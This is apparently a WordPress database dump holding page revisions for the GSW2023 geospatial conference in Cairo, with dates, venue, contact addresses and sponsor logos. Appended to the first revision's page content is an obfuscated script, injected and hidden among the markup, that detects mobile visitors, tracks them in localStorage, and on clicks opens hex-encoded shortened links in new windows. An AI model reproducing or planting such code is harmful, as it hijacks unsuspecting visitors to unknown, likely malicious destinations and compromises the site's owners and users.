class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:29:47','2023-08-16 00:29:47','',3066,'https://gsw2023.com/?p=5258',0,'revision','',0),
(5259,1,'2023-08-16 00:30:08','2023-08-16 00:30:08','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" 